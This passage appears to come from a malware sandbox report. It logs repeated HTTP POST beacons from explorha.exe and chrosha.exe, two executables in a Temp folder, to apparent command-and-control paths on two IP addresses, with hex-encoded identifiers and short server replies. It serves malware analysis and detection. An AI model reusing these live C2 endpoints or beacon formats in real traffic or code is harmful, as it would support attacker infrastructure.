                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      752192.168.2.550600193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.054770947 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.307419062 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      753192.168.2.550601193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.296361923 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.546500921 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      754192.168.2.550602193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.662244081 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.906815052 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      755192.168.2.550603193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:26.899458885 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:27.149405956 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      756192.168.2.550604193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:27.155600071 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:27.403345108 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      757192.168.2.550605193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:27.399296045 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:27.650108099 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      758192.168.2.550606193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:27.755814075 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.003319979 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      759192.168.2.550607193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.004874945 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.244998932 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      760192.168.2.550608193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.254482985 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.504972935 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      761192.168.2.550609193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.491209030 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.739625931 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      762192.168.2.550610193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:28.868971109 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.119822025 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      763192.168.2.550611193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.099334955 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.341481924 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      764192.168.2.550612193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.377603054 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.632725000 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      765192.168.2.550613193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.594042063 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.848201036 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      766192.168.2.550614193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:29.994434118 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.241482973 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      767192.168.2.550615193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.203097105 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.443202019 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      768192.168.2.550616193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:33:30.494560003 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
